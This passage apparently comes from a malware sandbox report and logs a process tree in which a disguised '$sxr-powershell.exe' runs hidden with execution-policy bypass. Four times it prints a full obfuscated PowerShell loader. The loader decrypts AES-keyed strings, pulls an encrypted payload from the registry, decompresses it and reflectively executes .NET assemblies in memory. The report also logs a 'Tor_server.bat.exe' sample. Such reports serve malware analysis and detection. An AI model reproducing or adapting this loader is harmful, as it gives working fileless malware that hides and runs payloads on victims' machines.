$HPwhP.ToArray();$xnpKq = $XVVPy | IEX;$ZLyfJ = $xnpKq::$UswSE2($quBDS);$xoyvm = $ZLyfJ.EntryPoint;$xoyvm.$UswSE0($null, (, [string[]] ($WtQaE)))
      4⤵
      PID:5520
  - - C:\Windows\$sxr-powershell.exe
      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5168).WaitForExit();[System.Threading.Thread]::Sleep(5000); function CzXOR($wCmAa){ $OeLLh=[System.Security.Cryptography.Aes]::Create(); $OeLLh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OeLLh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OeLLh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U='); $OeLLh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q=='); $CdjJU=$OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')(); $ZrPpX=$CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wCmAa, 0, $wCmAa.Length); $CdjJU.Dispose(); $OeLLh.Dispose(); $ZrPpX;}function XSkGH($wCmAa){ $YMVfV=New-Object System.IO.MemoryStream(,$wCmAa); $HPwhP=New-Object System.IO.MemoryStream; $LnniF=New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::Decompress); $LnniF.CopyTo($HPwhP); $LnniF.Dispose(); $YMVfV.Dispose(); $HPwhP.Dispose(); $HPwhP.ToArray();}function BdfTq($wCmAa,$IUdXm){ $ZLyfJ=[System.Reflection.Assembly]::Load([byte[]]$wCmAa); $xoyvm=$ZLyfJ.EntryPoint; $xoyvm.Invoke($null, $IUdXm);}$OeLLh1 = New-Object System.Security.Cryptography.AesManaged;$OeLLh1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$cXkwu = $OeLLh1.('rotpyrceDetaerC'[-1..-15] -join '')();$UswSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('18zwi26zozI/4sNwvOJxpg==');$UswSE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE, 0, $UswSE.Length);$UswSE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE);$Dsgcn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkARJ6Rv6BIg2MogoHYcmw/X0/TgnV5+LWpTmFkicv4=');$Dsgcn = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Dsgcn, 0, $Dsgcn.Length);$Dsgcn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Dsgcn);$WtQaE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CPgoovSvydwIKAVbsV0oUg==');$WtQaE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WtQaE, 0, $WtQaE.Length);$WtQaE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WtQaE);$XVVPy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iTx/W/jnzoHE14r8DEibMEyuaeYiE3dAqeSv8NW3jSN5A97h+1KY+THryvIh1dJiGmsnJ//SXLVPWbfMRzL7ufXSCGPz+pfVsuxaLTSyptiJPzqcoan9Xr1jE4Rmc5u7LTId80wSaXqLNmoB4fPg/P7NE3c2Yuw0nqWt/ZngWniFYubjYtKMqyyNRSfNgyr89Ug/vFc6LgfL0bPIYeBlHCze7nx8PsBL+Q/EBybHWqUfBjNVsJmx3EeYrFfxNdSC3e8Y+JBmg8TSGLJHyBt+tFwMt/TmHxps75m66JuQeZLlhKeLZ6bjJ74zTvsp2A8buoYwDETvErAcvrBSGhVS7mYWy6o4J4BMWokYyeV+Cq7Q8/73SCovtE69+hmKy7HRlFzPuhkQyPHRSeQjZ9+873yj/eogIwSIkiXGB0fk3+g=');$XVVPy = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVVPy, 0, $XVVPy.Length);$XVVPy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVVPy);$ZnwOj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l578nKfyTb6bpNlYfElbzQ==');$ZnwOj = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZnwOj, 0, $ZnwOj.Length);$ZnwOj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZnwOj);$cOnuq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1OZ44W6bdY1aa1QLUX4fJA==');$cOnuq = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cOnuq, 0, $cOnuq.Length);$cOnuq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cOnuq);$gBBaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KPGj8zPRDGjW+cttrplwtg==');$gBBaw = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gBBaw, 0, $gBBaw.Length);$gBBaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gBBaw);$HVXKt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wg3LvN/Da8EBkYu0PdZp+A==');$HVXKt = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HVXKt, 0, $HVXKt.Length);$HVXKt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HVXKt);$ewjne = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bahh8RYkzn28RHBrHTR6Rw==');$ewjne = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ewjne, 0, $ewjne.Length);$ewjne = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ewjne);$UswSE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7ps7mtx52AURDUYRcez/RA==');$UswSE0 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE0, 0, $UswSE0.Length);$UswSE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE0);$UswSE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c5XC748b+iFBdBWdnZ4s2w==');$UswSE1 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE1, 0, $UswSE1.Length);$UswSE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE1);$UswSE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJLAPTei3F5Fj8pfHCkW0A==');$UswSE2 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE2, 0, $UswSE2.Length);$UswSE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE2);$UswSE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7VMq7slMB5TL9zlr2duzSA==');$UswSE3 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE3, 0, $UswSE3.Length);$UswSE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE3);$cXkwu.Dispose();$OeLLh1.Dispose();$vDMJP = [Microsoft.Win32.Registry]::$HVXKt.$gBBaw($UswSE).$cOnuq($Dsgcn);$ZyJrD=[string[]]$vDMJP.Split('\');$pKkNV=XSkGH(CzXOR([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[1])));BdfTq $pKkNV (,[string[]] ('%*'));$quBDS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[0]);$OeLLh = New-Object System.Security.Cryptography.AesManaged;$OeLLh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$CdjJU = $OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')();$quBDS = $CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($quBDS, 0, $quBDS.Length);$CdjJU.Dispose();$OeLLh.Dispose();$YMVfV = New-Object System.IO.MemoryStream(, $quBDS);$HPwhP = New-Object System.IO.MemoryStream;$LnniF = New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::$UswSE1);$LnniF.$ewjne($HPwhP);$LnniF.Dispose();$YMVfV.Dispose();$HPwhP.Dispose();$quBDS = $HPwhP.ToArray();$xnpKq = $XVVPy | IEX;$ZLyfJ = $xnpKq::$UswSE2($quBDS);$xoyvm = $ZLyfJ.EntryPoint;$xoyvm.$UswSE0($null, (, [string[]] ($WtQaE)))
      4⤵
      PID:6468
  - - C:\Windows\$sxr-powershell.exe
      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5168).WaitForExit();[System.Threading.Thread]::Sleep(5000); function CzXOR($wCmAa){ $OeLLh=[System.Security.Cryptography.Aes]::Create(); $OeLLh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OeLLh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OeLLh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U='); $OeLLh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q=='); $CdjJU=$OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')(); $ZrPpX=$CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wCmAa, 0, $wCmAa.Length); $CdjJU.Dispose(); $OeLLh.Dispose(); $ZrPpX;}function XSkGH($wCmAa){ $YMVfV=New-Object System.IO.MemoryStream(,$wCmAa); $HPwhP=New-Object System.IO.MemoryStream; $LnniF=New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::Decompress); $LnniF.CopyTo($HPwhP); $LnniF.Dispose(); $YMVfV.Dispose(); $HPwhP.Dispose(); $HPwhP.ToArray();}function BdfTq($wCmAa,$IUdXm){ $ZLyfJ=[System.Reflection.Assembly]::Load([byte[]]$wCmAa); $xoyvm=$ZLyfJ.EntryPoint; $xoyvm.Invoke($null, $IUdXm);}$OeLLh1 = New-Object System.Security.Cryptography.AesManaged;$OeLLh1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$cXkwu = $OeLLh1.('rotpyrceDetaerC'[-1..-15] -join '')();$UswSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('18zwi26zozI/4sNwvOJxpg==');$UswSE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE, 0, $UswSE.Length);$UswSE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE);$Dsgcn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkARJ6Rv6BIg2MogoHYcmw/X0/TgnV5+LWpTmFkicv4=');$Dsgcn = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Dsgcn, 0, $Dsgcn.Length);$Dsgcn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Dsgcn);$WtQaE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CPgoovSvydwIKAVbsV0oUg==');$WtQaE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WtQaE, 0, $WtQaE.Length);$WtQaE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WtQaE);$XVVPy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iTx/W/jnzoHE14r8DEibMEyuaeYiE3dAqeSv8NW3jSN5A97h+1KY+THryvIh1dJiGmsnJ//SXLVPWbfMRzL7ufXSCGPz+pfVsuxaLTSyptiJPzqcoan9Xr1jE4Rmc5u7LTId80wSaXqLNmoB4fPg/P7NE3c2Yuw0nqWt/ZngWniFYubjYtKMqyyNRSfNgyr89Ug/vFc6LgfL0bPIYeBlHCze7nx8PsBL+Q/EBybHWqUfBjNVsJmx3EeYrFfxNdSC3e8Y+JBmg8TSGLJHyBt+tFwMt/TmHxps75m66JuQeZLlhKeLZ6bjJ74zTvsp2A8buoYwDETvErAcvrBSGhVS7mYWy6o4J4BMWokYyeV+Cq7Q8/73SCovtE69+hmKy7HRlFzPuhkQyPHRSeQjZ9+873yj/eogIwSIkiXGB0fk3+g=');$XVVPy = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVVPy, 0, $XVVPy.Length);$XVVPy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVVPy);$ZnwOj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l578nKfyTb6bpNlYfElbzQ==');$ZnwOj = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZnwOj, 0, $ZnwOj.Length);$ZnwOj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZnwOj);$cOnuq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1OZ44W6bdY1aa1QLUX4fJA==');$cOnuq = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cOnuq, 0, $cOnuq.Length);$cOnuq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cOnuq);$gBBaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KPGj8zPRDGjW+cttrplwtg==');$gBBaw = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gBBaw, 0, $gBBaw.Length);$gBBaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gBBaw);$HVXKt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wg3LvN/Da8EBkYu0PdZp+A==');$HVXKt = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HVXKt, 0, $HVXKt.Length);$HVXKt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HVXKt);$ewjne = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bahh8RYkzn28RHBrHTR6Rw==');$ewjne = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ewjne, 0, $ewjne.Length);$ewjne = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ewjne);$UswSE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7ps7mtx52AURDUYRcez/RA==');$UswSE0 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE0, 0, $UswSE0.Length);$UswSE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE0);$UswSE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c5XC748b+iFBdBWdnZ4s2w==');$UswSE1 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE1, 0, $UswSE1.Length);$UswSE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE1);$UswSE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJLAPTei3F5Fj8pfHCkW0A==');$UswSE2 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE2, 0, $UswSE2.Length);$UswSE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE2);$UswSE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7VMq7slMB5TL9zlr2duzSA==');$UswSE3 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE3, 0, $UswSE3.Length);$UswSE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE3);$cXkwu.Dispose();$OeLLh1.Dispose();$vDMJP = [Microsoft.Win32.Registry]::$HVXKt.$gBBaw($UswSE).$cOnuq($Dsgcn);$ZyJrD=[string[]]$vDMJP.Split('\');$pKkNV=XSkGH(CzXOR([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[1])));BdfTq $pKkNV (,[string[]] ('%*'));$quBDS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[0]);$OeLLh = New-Object System.Security.Cryptography.AesManaged;$OeLLh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$CdjJU = $OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')();$quBDS = $CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($quBDS, 0, $quBDS.Length);$CdjJU.Dispose();$OeLLh.Dispose();$YMVfV = New-Object System.IO.MemoryStream(, $quBDS);$HPwhP = New-Object System.IO.MemoryStream;$LnniF = New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::$UswSE1);$LnniF.$ewjne($HPwhP);$LnniF.Dispose();$YMVfV.Dispose();$HPwhP.Dispose();$quBDS = $HPwhP.ToArray();$xnpKq = $XVVPy | IEX;$ZLyfJ = $xnpKq::$UswSE2($quBDS);$xoyvm = $ZLyfJ.EntryPoint;$xoyvm.$UswSE0($null, (, [string[]] ($WtQaE)))
      4⤵
      PID:2764
  - - C:\Windows\$sxr-powershell.exe
      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5168).WaitForExit();[System.Threading.Thread]::Sleep(5000); function CzXOR($wCmAa){ $OeLLh=[System.Security.Cryptography.Aes]::Create(); $OeLLh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OeLLh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OeLLh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U='); $OeLLh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q=='); $CdjJU=$OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')(); $ZrPpX=$CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wCmAa, 0, $wCmAa.Length); $CdjJU.Dispose(); $OeLLh.Dispose(); $ZrPpX;}function XSkGH($wCmAa){ $YMVfV=New-Object System.IO.MemoryStream(,$wCmAa); $HPwhP=New-Object System.IO.MemoryStream; $LnniF=New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::Decompress); $LnniF.CopyTo($HPwhP); $LnniF.Dispose(); $YMVfV.Dispose(); $HPwhP.Dispose(); $HPwhP.ToArray();}function BdfTq($wCmAa,$IUdXm){ $ZLyfJ=[System.Reflection.Assembly]::Load([byte[]]$wCmAa); $xoyvm=$ZLyfJ.EntryPoint; $xoyvm.Invoke($null, $IUdXm);}$OeLLh1 = New-Object System.Security.Cryptography.AesManaged;$OeLLh1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$cXkwu = $OeLLh1.('rotpyrceDetaerC'[-1..-15] -join '')();$UswSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('18zwi26zozI/4sNwvOJxpg==');$UswSE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE, 0, $UswSE.Length);$UswSE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE);$Dsgcn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkARJ6Rv6BIg2MogoHYcmw/X0/TgnV5+LWpTmFkicv4=');$Dsgcn = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Dsgcn, 0, $Dsgcn.Length);$Dsgcn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Dsgcn);$WtQaE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CPgoovSvydwIKAVbsV0oUg==');$WtQaE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WtQaE, 0, $WtQaE.Length);$WtQaE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WtQaE);$XVVPy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iTx/W/jnzoHE14r8DEibMEyuaeYiE3dAqeSv8NW3jSN5A97h+1KY+THryvIh1dJiGmsnJ//SXLVPWbfMRzL7ufXSCGPz+pfVsuxaLTSyptiJPzqcoan9Xr1jE4Rmc5u7LTId80wSaXqLNmoB4fPg/P7NE3c2Yuw0nqWt/ZngWniFYubjYtKMqyyNRSfNgyr89Ug/vFc6LgfL0bPIYeBlHCze7nx8PsBL+Q/EBybHWqUfBjNVsJmx3EeYrFfxNdSC3e8Y+JBmg8TSGLJHyBt+tFwMt/TmHxps75m66JuQeZLlhKeLZ6bjJ74zTvsp2A8buoYwDETvErAcvrBSGhVS7mYWy6o4J4BMWokYyeV+Cq7Q8/73SCovtE69+hmKy7HRlFzPuhkQyPHRSeQjZ9+873yj/eogIwSIkiXGB0fk3+g=');$XVVPy = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVVPy, 0, $XVVPy.Length);$XVVPy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVVPy);$ZnwOj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l578nKfyTb6bpNlYfElbzQ==');$ZnwOj = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZnwOj, 0, $ZnwOj.Length);$ZnwOj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZnwOj);$cOnuq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1OZ44W6bdY1aa1QLUX4fJA==');$cOnuq = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cOnuq, 0, $cOnuq.Length);$cOnuq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cOnuq);$gBBaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KPGj8zPRDGjW+cttrplwtg==');$gBBaw = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gBBaw, 0, $gBBaw.Length);$gBBaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gBBaw);$HVXKt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wg3LvN/Da8EBkYu0PdZp+A==');$HVXKt = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HVXKt, 0, $HVXKt.Length);$HVXKt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HVXKt);$ewjne = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bahh8RYkzn28RHBrHTR6Rw==');$ewjne = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ewjne, 0, $ewjne.Length);$ewjne = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ewjne);$UswSE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7ps7mtx52AURDUYRcez/RA==');$UswSE0 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE0, 0, $UswSE0.Length);$UswSE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE0);$UswSE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c5XC748b+iFBdBWdnZ4s2w==');$UswSE1 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE1, 0, $UswSE1.Length);$UswSE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE1);$UswSE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJLAPTei3F5Fj8pfHCkW0A==');$UswSE2 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE2, 0, $UswSE2.Length);$UswSE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE2);$UswSE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7VMq7slMB5TL9zlr2duzSA==');$UswSE3 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE3, 0, $UswSE3.Length);$UswSE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE3);$cXkwu.Dispose();$OeLLh1.Dispose();$vDMJP = [Microsoft.Win32.Registry]::$HVXKt.$gBBaw($UswSE).$cOnuq($Dsgcn);$ZyJrD=[string[]]$vDMJP.Split('\');$pKkNV=XSkGH(CzXOR([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[1])));BdfTq $pKkNV (,[string[]] ('%*'));$quBDS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[0]);$OeLLh = New-Object System.Security.Cryptography.AesManaged;$OeLLh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$CdjJU = $OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')();$quBDS = $CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($quBDS, 0, $quBDS.Length);$CdjJU.Dispose();$OeLLh.Dispose();$YMVfV = New-Object System.IO.MemoryStream(, $quBDS);$HPwhP = New-Object System.IO.MemoryStream;$LnniF = New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::$UswSE1);$LnniF.$ewjne($HPwhP);$LnniF.Dispose();$YMVfV.Dispose();$HPwhP.Dispose();$quBDS = $HPwhP.ToArray();$xnpKq = $XVVPy | IEX;$ZLyfJ = $xnpKq::$UswSE2($quBDS);$xoyvm = $ZLyfJ.EntryPoint;$xoyvm.$UswSE0($null, (, [string[]] ($WtQaE)))
      4⤵
      PID:184

C:\Users\Admin\Downloads\Tor_server\Tor_server.bat.exe
"C:\Users\Admin\Downloads\Tor_server\Tor_server.bat.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4144

C:\Windows\System32\cmd.exe
